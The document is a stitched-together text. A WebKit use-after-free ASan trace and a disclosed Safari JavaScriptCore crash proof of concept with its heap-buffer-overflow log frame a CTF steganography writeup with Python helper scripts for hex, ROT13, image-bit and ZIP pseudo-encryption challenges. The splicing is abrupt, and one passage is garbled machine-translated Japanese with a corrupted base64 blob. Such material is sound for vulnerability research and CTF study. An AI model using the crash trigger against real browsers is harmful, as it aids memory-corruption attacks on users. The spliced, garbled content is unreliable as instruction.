#5 0x107e0df0b in WebKit::WebFrameLoaderClient::transitionToCommittedForNewPage() (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x625f0b)
#6 0x115beb6cf in WebCore::FrameLoader::transitionToCommitted(WebCore::CachedPage*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8f6cf)
#7 0x115bea77b in WebCore::FrameLoader::commitProvisionalLoad() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8e77b)
#8 0x1158e6197 in WebCore::DocumentLoader::finishedLoading(double) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x78a197)
#9 0x1158ee2e5 in WebCore::DocumentLoader::maybeLoadEmpty() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7922e5)
#10 0x1158ee6d3 in WebCore::DocumentLoader::startLoadingMainResource() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7926d3)
#11 0x115beec01 in WebCore::FrameLoader::continueLoadAfterWillSubmitForm() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa92c01)
#12 0x115be8495 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8c495)
#13 0x115bfc4ba in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa04ba)
#14 0x115bfc301 in void std::__1::__invoke_void_return_wrapper<void>::__call<WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool>(WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&&&, WebCore::ResourceRequest const&&&, WTF::PassRefPtr<WebCore::FormState>&&, bool&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa0301)
#15 0x1170fd592 in std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1592)
#16 0x1170fd300 in WebCore::PolicyCallback::call(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1300)
#17 0x1170ff0aa in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa30aa)
#18 0x107df7b2e in std::__1::function<void (WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60fb2e)
#19 0x107df7986 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60f986)
#20 0x107e07dbc in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::PolicyAction)>) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x61fdbc)
#21 0x1170fea08 in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa2a08)
#22 0x115be72b3 in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8b2b3)
#23 0x115be5de6 in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa89de6)
#24 0x115be2113 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa86113)
#25 0x115be043c in WebCore::FrameLoader::loadURLIntoChildFrame(WebCore::URL const&, WTF::String const&, WebCore::Frame*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8443c)
#26 0x107e0ed25 in WebKit::WebFrameLoaderClient::createFrame(WebCore::URL const&, WTF::String const&, WebCore::HTMLFrameOwnerElement*, WTF::String const&, bool, int, int) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x626d25)
#27 0x117966328 in WebCore::SubframeLoader::loadSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::String const&, WTF::String const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x280a328)
#28 0x117964335 in WebCore::SubframeLoader::loadOrRedirectSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2808335)
#29 0x117963f47 in WebCore::SubframeLoader::requestFrame(WebCore::HTMLFrameOwnerElement&, WTF::String const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2807f47)
SUMMARY: AddressSanitizer: heap-use-after-free (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7788a) in WTF::TypeCastTraits<WebCore::FrameView const, WebCore::ScrollView const, false>::isType(WebCore::Widget const&)
Shadow bytes around the buggy address:
0x1c3400018b00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018b10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018b20: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
0x1c3400018b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x1c3400018b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x1c3400018b50:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018b60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018b70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018b80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018b90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018ba0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==54938==ABORTING
-->
1. Flag submission format
flag{th1s_!s_a_d4m0_4la9}
2. PDF steganography
writeup: Convert the PDF to a Word document with an online PDF-to-Word tool (https://app.xunjiepdf.com/pdf2word/); the flag is readable in the converted document.
3. GIF picture steganography
writeup:
1. Open the file in the StegSolve tool. StegSolve is used to display particular information hidden inside a static image file; the functions that matter here are:
Data Extract: extract data hidden in a picture
Frame Browser: split an animation such as a GIF into its individual frames so that each one can be viewed as a still image
Image Combiner: stitch or puzzle pictures together
2. The QR code in the frames is missing the three small squares called finder patterns (position detection patterns). They mark the extent of the QR code's rectangle; with all three present, the position and orientation of the code can be determined.
3. Save a screenshot of the still frame, repair the QR code in Photoshop (redraw the missing finder patterns), then scan it.
https://jiema.wwei.cn/ (online QR code recognition tool)
4. jar steganography
writeup:
1. Open the jar in JD-GUI and search directly for "flag".
2. Base64-decode the value you find to get flag{dajidali_jinwanchiji}
5. Black and white pictures in an encrypted archive
writeup:
1. Viewing the pictures in WinHex turned up no usable information, so I guessed that the black and white pictures stand for the binary digits 0 and 1. There are 104 pictures in total, exactly a multiple of 8, so every 8 pictures can be read as one byte and converted to an ASCII character. Because there are so many pictures, write a Python script; it uses PIL (Python Imaging Library), a third-party image-processing library for Python:
from PIL import Image

result = ''
for i in range(104):
    img = Image.open(f'c:\\users\\backlion\\desktop\\ctf\\jpg\\gif\\{i}.jpg')
    im_rgb = img.convert('RGB')  # convert the image to RGB mode
    r, g, b = im_rgb.getpixel((1, 1))  # read the RGB value at pixel (1, 1)
    print(r, g, b)  # in this challenge a white picture reads 255,255,255 and a black one 12,12,0
    if r != 255:  # 255 is white, so anything else is black
        result += '1'
    else:
        result += '0'
# convert the binary string to ASCII, 8 bits at a time
for i in range(0, len(result), 8):
    byte = result[i:i + 8]
    print(chr(int(byte, 2)), end='')
'''
result:
flag{fun_gif}
'''
2. Alternatively, use an online binary-to-string converter: http://www.txttool.com/wenben_binarystr.asp
6. ASCII
writeup: The message is:
c8e9aca0c6f2e5f3e8c4efe7a1a0d4e8e5a0e6ece1e7a0e9f3baa0e8eafae3f9e4eafae2eae4e3eaebfaebe3f5e7e9f3e4e3e8eaf9eaf3e2e4e6f2
1. The encoding is easy to guess: the highest character is f, so the text is hexadecimal, read two characters at a time. Convert each pair from hex to decimal. Every value is above 127, but ASCII codes never exceed 127, so subtract 128 from each value and convert it to a character to obtain the flag.
string = 'c8e9aca0c6f2e5f3e8c4efe7a1a0d4e8e5a0e6ece1e7a0e9f3baa0e8eafae3f9e4eafae2eae4e3eaebfaebe3f5e7e9f3e4e3e8eaf9eaf3e2e4e6f2'
flag = ''
for i in range(0, len(string), 2):
    s = '0x' + string[i] + string[i + 1]  # one byte as a hex literal
    flag += chr(int(s, 16) - 128)        # every byte is the ASCII code plus 128
print(flag)
2. Result: Hi, FreshDog! The flag is: hjzcydjzbjdcjkzkzkcugisdchjyjsbdfr
Note: jPocketKnife can also be used to convert the hex to ASCII.
7. Buddha-text decryption (与佛论禅)
writeup:
1. The text is a long passage of Buddhist sutra-style characters.
2. The meaning of the Buddha's words is decoded with the online tool http://www.keyfc.net/bbs/tools/tudoucode.aspx
3. The decoded string mzkum3gvmuawnzuvn3cgozmlmtuvqzaenjchmuaeqzwenzemljw9 is then put through ROT13 (following the hint "the 13 palms of the Tathagata" in the title), which gives
zmxhz3tizhnjamhia3ptbmzyzghidmnrawpuzhnrdmjramrzywj9
https://rot13.com/ (online tool). Python decryption:
# coding: utf-8

def decoder(crypt_str, shift):
    # shift every ASCII letter forward by `shift` places, wrapping within its own case
    plain_str = ''
    num = int(shift)
    for ch in crypt_str:
        ch = ord(ch)
        if ord('a') <= ch <= ord('z'):  # lowercase letter
            ch = ch + num
            if ch > ord('z'):
                ch -= 26
        elif ord('A') <= ch <= ord('Z'):  # uppercase letter
            ch = ch + num
            if ch > ord('Z'):
                ch -= 26
        plain_str += chr(ch)  # digits and punctuation pass through unchanged
    print(plain_str)

crypt_str = input('crypto_text:')
print('!-------decode------!')
shift = 13
decoder(crypt_str, shift)
Note: ROT13 is a simple substitution cipher that swaps the first 13 letters of the alphabet with the last 13, so applying it twice restores the original text.
4. Base64-decode the result (base64 is case-sensitive, so keep the original letter case of the ROT13 output):
flag{bdscjhbkzmnfrdhbvvckijndskvbkjdsab}
writeup:1。 Google Chromeを介してPDFファイルを開き、テキストコンテンツをテキストにコピーします
baba Bbb ba bba ba ba ba ba b aab bbb ba aaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb baaaaaaaaaaaaaaabbb aaabb2。 Aababaスタイルのものの大部分は01だと思いますが、これらは分割されており、Mossパスワードのみを考えることができるため、Mossパスワードに変更しようとします。次に、「a」を「」、「b」に「 - 」に変更し、get -.--を変更します。 - 。 --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --..-- --..-- --...-- --...............................
CONGRATULATIONSnullFLAGnull1NV151BL3M3554G34.変換:Flagnull後に内容を取り、Letterを小文字に変更し、フォーマットフラグ{1NV151BL3M3554G3}を下位ケースに変換します:Flag {1NV151BL3M3554G3}
8. Morse code steganography in a PDF
Basic knowledge: 1. Common file header and trailer structures. Writeup: 1. This position is the file header; 65 is the end of the file flag.txt and a83c is the check code, so 7c stands for the block type, and here the block type is file header.
2. Change 7b to 74.
3. Save and decompress, then drop Sercet.png into WinHex, confirm that the file header is that of a GIF image, and change the extension to .gif.
Common file encoding knowledge:
JPG image start marker: FF D8, end marker: FF D9
GIF image start marker: 47 49 46 38 39 61, end marker: 01 01 00 3B
4. After changing the extension to .gif, use Stegsolve's Frame Browser to split it into two pictures; use the left and right arrows to select the layer and separate the QR code, which gives two incomplete QR codes.
5. From the question we know it is a double-layer picture. Open the separated layers in PS and save them
(specific steps: click Layer - Duplicate Layer - OK, then File - Save As - Save)
Full QR code in PS; scan it to get the flag: flag{yanji4n_bu_we1shi}
6. Online PS tool: https://www.uupoop.com/ps/?hmsr=ps_menu (select Color Range, adjust the colour range until one QR code becomes visible, then splice)
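The header/trailer check from steps 1 and 3 above, as an added Python example (not code from the writeup): identify a file by its magic bytes rather than its extension, and report when the two disagree, which is how a .png that is really a GIF is caught. The JPG and GIF signatures are the ones the writeup lists; PNG, ZIP and RAR are added. Note that the only fixed GIF trailer byte is the final 3B (the GIF Trailer); the 01 01 00 before it varies, so only 3B is checked. The sample files are constructed.

```python
# Header and trailer signatures. A trailer of None means the format has no fixed
# end marker worth checking here. bytes.startswith accepts a tuple of candidates.
SIGNATURES = {
    "jpg": (b"\xff\xd8", b"\xff\xd9"),                       # FF D8 ... FF D9
    "gif": ((b"GIF89a", b"GIF87a"), b"\x3b"),                # 47 49 46 38 39 61 ... 3B
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"),
    "zip": (b"PK\x03\x04", None),
    "rar": (b"Rar!\x1a\x07", None),
}

EXT_ALIASES = {"jpeg": "jpg"}


def identify(data, claimed_ext=None):
    """Return (detected_type, trailer_ok, extension_mismatch) from the bytes alone."""
    for kind, (head, tail) in SIGNATURES.items():
        if data.startswith(head):
            trailer_ok = tail is None or data.endswith(tail)
            ext = None
            if claimed_ext is not None:
                ext = claimed_ext.lower().lstrip(".")
                ext = EXT_ALIASES.get(ext, ext)
            return kind, trailer_ok, ext is not None and ext != kind
    return "unknown", False, False


def triage(files):
    """files: {name: bytes}. One human-readable line per file, the way you would
    eyeball the first and last bytes in WinHex."""
    lines = []
    for name, data in files.items():
        ext = name.rsplit(".", 1)[-1] if "." in name else None
        kind, trailer_ok, mismatch = identify(data, ext)
        notes = []
        if mismatch:
            notes.append("extension says .%s, content is %s" % (ext, kind))
        if kind != "unknown" and not trailer_ok:
            notes.append("trailer missing or truncated")
        suffix = " (" + "; ".join(notes) + ")" if notes else ""
        lines.append("%s: %s%s" % (name, kind, suffix))
    return lines


# Constructed samples: only the header and trailer bytes matter for this check.
SAMPLES = {
    "Sercet.png": b"GIF89a" + b"\x00" * 16 + b"\x01\x01\x00\x3b",  # a GIF behind a .png name
    "photo.jpg": b"\xff\xd8" + b"\x00" * 16 + b"\xff\xd9",
    "cut.jpg": b"\xff\xd8" + b"\x00" * 16,                         # no FF D9: truncated
    "notes.txt": b"just text",
}

if __name__ == "__main__":
    for line in triage(SAMPLES):
        print(line)
```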
9. GIF steganography inside a corrupted RAR file
Basic knowledge: 1. Compressed source file data area (local file header):
50 4b 03 04: local file header signature (0x04034b50)
14 03: PKWARE version needed to extract
00 00: general purpose bit flag (the key mark for determining whether there is encryption)
08 00: compression method
68 BF: last modified file time
9b 48: last modified file date
Fe 32 7d 4b: CRC-32 check
E9 0D 00 00: compressed size
B5 1B 00 00: uncompressed size
09 00: file name length
00 00: extra field length
2. Compressed source file directory area (central directory):
50 4b 01 02: central directory file header signature (0x02014b50)
3F 03: PKWARE version used for compression (version made by)
14 03: PKWARE version needed to extract
00 00: general purpose bit flag (the key mark for whether there is encryption; this is the field that is changed for pseudo-encryption: set it to 09 00 and opening the archive prompts for a password)
08 00: compression method
68 BF: last modified file time
9b 48: last modified file date
Fe 32 7d 4b: CRC-32 check (1480b516)
E9 0D 00 00: compressed size (25)
B5 1B 00 00: uncompressed size (23)
09 00: file name length
24 00: extra field length
00 00: file comment length
00 00: disk number start
00 00: internal file attributes
20 80 ED 81: external file attributes
00 00 00: relative offset of the local header
Compressed source file directory end flag (end of central directory record):
50 4b 05 06: end of central directory signature
00 00: number of this disk
00 00: disk on which the central directory starts
01 00: total number of records on this disk
01 00: total number of records in the central directory
5B 00 00 00: size of the central directory
10 0E 00 00: offset of the central directory from the start of the first disk
00 00: ZIP file comment length
Next, distinguishing real and fake encryption:
1. No encryption
The general purpose flag in the compressed source file data area (local file header) must be 00 00
The general purpose flag in the compressed source file directory area (central directory) must be 00 00
2. Fake (pseudo) encryption
The general purpose flag in the compressed source file data area must be 00 00
The general purpose flag in the compressed source file directory area must be 09 00
3. Real encryption
The general purpose flag in the compressed source file data area must be 09 00
The general purpose flag in the compressed source file directory area must be 09 00
Writeup:
1. The flag in the data area is 00 00 but at the end (central directory) it is 09 00, so this is pseudo-encryption. Change 09 00 to 00 00 and the file can be decompressed and opened.
2. Decrypt it (remove the pseudo-encryption) with the zipcenop.jar tool: java -jar zipcenop.jar r xxx.zip
Opening the txt file shows a lot of base64:
u3rlz2fub2dyyxboesbpcyb0agugyxj0igfuzcbzy2llbmnlig9mihdyaxrpbmcgaglkzgvuig1lc3nhz2vzigluihn1y2ggysb3yxk gdghhdcbubybvbmv=lcbhcgfydcbmcmcm9tihrozsbzzwkzxigyw5kigludgvuzgvkihjly2lwawvudcwgc3vzcgu=y3rzihrozsbleglgl zdgvuy2ugb2ygdghlig1lc3m=ywdllcbhigzvcm0gb2ygc2vjdxjpdhkgdghyb3vnacbvynnnjdxjpdhkuifs=agugd29yzcbzdgvn. yzwvrig9yawdpbibhbmqgbwvhbnmgimnvbmnlyw==bgvkihdyaxrpbmciigzyb20gdghliedyzwvrihdvcmrzihn0zwdhbm9zig1lyw5pbmcgimnvdmvyzwqgb3ig chjvdgvjdgvkiwgyw5kigdyyxbozwluig1lyw5pbmcginrvihc=cmml0zsiuifrozsbmaxjzdcbyzwnvcmrlzcb1c2ugb2ygdghlihrlcm0d2ffzigluide0otk gynkgsm9oyw5uzxmgvhjpdghlbwl1cybpbiboaxmgu3rlz2fub2dboawesigdhjlyv==dglzsbvvbibjcnlwdg9ncmfwahkgyw5kihn0zwdhbm9ncmfwhkggz glzz8==dwlzzwqgyxmgybibib29rig9uig1hz2ljlibhzw5lcmfsbhksig1lc3p=ywdlcyb3awxsigfwcgvhcib0bybizsbzb21ldghpbmcgzwxzogaw1hz2vzlc bhcnrpy2xlcywgc2hvchbpbmcgbglzdhmsig9yihnvbwugb3r=agvyignvdmvydgv4dcbhbmqsignsyxnzawnhhbgx5lcb0agugaglkzgvuig1lc3nhz2ugbwf5igj
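The ZIP layout listed above and the true/fake encryption rule, as one added Python example (not code from the writeup and not zipcenop.jar): it walks the end-of-central-directory record, the central directory entries and each member's local file header using the field layout given above, compares bit 0 of the two general purpose flags per member, and clears the central directory bit only for members whose local header says they are not encrypted, so a genuinely encrypted member is never touched. The archive is constructed with the standard library; the pseudo-encryption is applied to it in the same way the challenge author did, so the detector and the fix can be checked end to end.

```python
import io
import struct
import zipfile

LOCAL_SIG, CENTRAL_SIG, EOCD_SIG = b"PK\x03\x04", b"PK\x01\x02", b"PK\x05\x06"
CENTRAL_FMT = "<4sHHHHHHIIIHHHHHII"   # 46-byte central directory file header
EOCD_FMT = "<4sHHHHIIH"               # 22-byte end of central directory record
ENCRYPTED_BIT = 0x0001                # bit 0 of the general purpose bit flag
CD_FLAG_OFF, LH_FLAG_OFF = 8, 6       # offset of the flag field inside each header


def build_sample_zip():
    """Constructed sample archive (not the CTF file): a single deflated member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("flag.txt", "flag{constructed_sample}")
    return buf.getvalue()


def central_entries(data):
    """Walk the central directory; yield (name, flag offset in the CD entry,
    flag offset in the matching local file header)."""
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no end of central directory record")
    fields = struct.unpack(EOCD_FMT, data[eocd:eocd + 22])
    n_total, cd_offset = fields[4], fields[6]
    pos = cd_offset
    for _ in range(n_total):
        f = struct.unpack(CENTRAL_FMT, data[pos:pos + 46])
        if f[0] != CENTRAL_SIG:
            raise ValueError("bad central directory signature at offset %d" % pos)
        name_len, extra_len, comment_len, local_off = f[10], f[11], f[12], f[16]
        name = data[pos + 46:pos + 46 + name_len].decode("ascii", "replace")
        if data[local_off:local_off + 4] != LOCAL_SIG:
            raise ValueError("bad local file header signature for %r" % name)
        yield name, pos + CD_FLAG_OFF, local_off + LH_FLAG_OFF
        pos += 46 + name_len + extra_len + comment_len


def classify(data):
    """Apply the rule from the text per member: compare bit 0 of both flags."""
    verdicts = {}
    for name, cd_off, lh_off in central_entries(data):
        cd_enc = bool(struct.unpack_from("<H", data, cd_off)[0] & ENCRYPTED_BIT)
        lh_enc = bool(struct.unpack_from("<H", data, lh_off)[0] & ENCRYPTED_BIT)
        if cd_enc and lh_enc:
            verdicts[name] = "encrypted"
        elif cd_enc:
            verdicts[name] = "pseudo-encrypted"
        elif lh_enc:
            verdicts[name] = "inconsistent (local flag set, central flag clear)"
        else:
            verdicts[name] = "not encrypted"
    return verdicts


def set_pseudo_encryption(data):
    """Reproduce the trick: set the encryption bit in the central directory only."""
    buf = bytearray(data)
    for _, cd_off, _ in central_entries(data):
        flag = struct.unpack_from("<H", buf, cd_off)[0] | ENCRYPTED_BIT
        struct.pack_into("<H", buf, cd_off, flag)
    return bytes(buf)


def clear_pseudo_encryption(data):
    """Undo it: clear the central bit for members whose local header is not
    encrypted. Members that are really encrypted (both bits set) are left alone."""
    buf = bytearray(data)
    for _, cd_off, lh_off in central_entries(data):
        if not struct.unpack_from("<H", buf, lh_off)[0] & ENCRYPTED_BIT:
            flag = struct.unpack_from("<H", buf, cd_off)[0] & 0xFFFE
            struct.pack_into("<H", buf, cd_off, flag)
    return bytes(buf)


def read_member(data, name):
    """Member bytes, or None when the archive demands a password (what the solver sees)."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return zf.read(name)
    except RuntimeError:
        return None


if __name__ == "__main__":
    plain = build_sample_zip()
    pseudo = set_pseudo_encryption(plain)
    print(classify(pseudo), read_member(pseudo, "flag.txt"))
    fixed = clear_pseudo_encryption(pseudo)
    print(classify(fixed), read_member(fixed, "flag.txt"))
```

Python's zipfile, like the tools mentioned in the writeup, trusts the central directory flag, so the pseudo-encrypted archive asks for a password until the bit is cleared; the detector's "inconsistent" verdict covers the reverse mismatch, which the text does not list but which a parser has to handle.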
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1098
I confirmed the PoC crashes the release version of Safari 10.0.3(12602.4.8).
(It might need to refresh the page several times.)
PoC:
-->
(function (x = 0) {
var a;
{
function arguments() {
}
function b() {
var g = 1;
a[5];
}
f();
g();
}
}());
<!--
Asan Log:
==55079==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c0000c8e88 at pc 0x00010c30506a bp 0x7fff58fae860 sp 0x7fff58fae858
READ of size 8 at 0x60c0000c8e88 thread T0
#0 0x10c305069 in JSC::SymbolTableEntry::isWatchable() const (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1671069)
#1 0x10c304f40 in JSC::SymbolTableEntry::prepareToWatch() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1670f40)
#2 0x10b2bd728 in JSC::CodeBlock::finishCreation(JSC::VM&, JSC::ScriptExecutable*, JSC::UnlinkedCodeBlock*, JSC::JSScope*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x629728)
#3 0x10c290c73 in JSC::FunctionCodeBlock::create(JSC::VM*, JSC::FunctionExecutable*, JSC::UnlinkedFunctionCodeBlock*, JSC::JSScope*, WTF::PassRefPtr<JSC::SourceProvider>, unsigned int, unsigned int) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x15fcc73)
#4 0x10c2901ea in JSC::ScriptExecutable::newCodeBlockFor(JSC::CodeSpecializationKind, JSC::JSFunction*, JSC::JSScope*, JSC::JSObject*&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x15fc1ea)
#5 0x10c29182a in JSC::ScriptExecutable::prepareForExecutionImpl(JSC::VM&, JSC::JSFunction*, JSC::JSScope*, JSC::CodeSpecializationKind, JSC::CodeBlock*&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x15fd82a)
#6 0x10bf2c921 in JSC::LLInt::setUpCall(JSC::ExecState*, JSC::Instruction*, JSC::CodeSpecializationKind, JSC::JSValue, JSC::LLIntCallLinkInfo*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1298921)
#7 0x10bf3b9ce in llint_entry (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12a79ce)
#8 0x10bf34faa in vmEntryToJavaScript (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12a0faa)
#9 0x10bbf7d1d in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf63d1d)
#10 0x10bb80c6d in JSC::Interpreter::execute(JSC::ProgramExecutable*, JSC::ExecState*, JSC::JSObject*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xeecc6d)
#11 0x10b371316 in JSC::evaluate(JSC::ExecState*, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6dd316)
#12 0x10b37151e in JSC::profiledEvaluate(JSC::ExecState*, JSC::ProfilingReason, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6dd51e)
#13 0x116201743 in WebCore::JSMainThreadExecState::profiledEvaluate(JSC::ExecState*, JSC::ProfilingReason, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24f5743)
#14 0x1162012b4 in WebCore::ScriptController::evaluateInWorld(WebCore::ScriptSourceCode const&, WebCore::DOMWrapperWorld&, WebCore::ExceptionDetails*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24f52b4)
#15 0x116214881 in WebCore::ScriptElement::executeClassicScript(WebCore::ScriptSourceCode const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2508881)
#16 0x116211943 in WebCore::ScriptElement::prepareScript(WTF::TextPosition const&, WebCore::ScriptElement::LegacyTypeSupport) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2505943)
#17 0x114a13b5c in WebCore::HTMLScriptRunner::runScript(WebCore::Element*, WTF::TextPosition const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd07b5c)
#18 0x114a13895 in WebCore::HTMLScriptRunner::execute(WTF::PassRefPtr<WebCore::Element>, WTF::TextPosition const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd07895)
#19 0x11493fc35 in WebCore::HTMLDocumentParser::runScriptsForPausedTreeBuilder() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc33c35)
#20 0x114940372 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc34372)
#21 0x11493f544 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc33544)
#22 0x114940f9d in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc34f9d)
